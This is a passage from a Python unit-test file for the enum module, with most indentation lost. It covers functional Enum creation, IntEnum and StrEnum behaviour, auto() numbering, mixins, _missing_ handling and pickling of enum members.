self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m^3 kg^-1 s^-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next garbage collection
# cycle, unlike Class1.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
    def test_multiple_mixin_with_common_data_type(self):
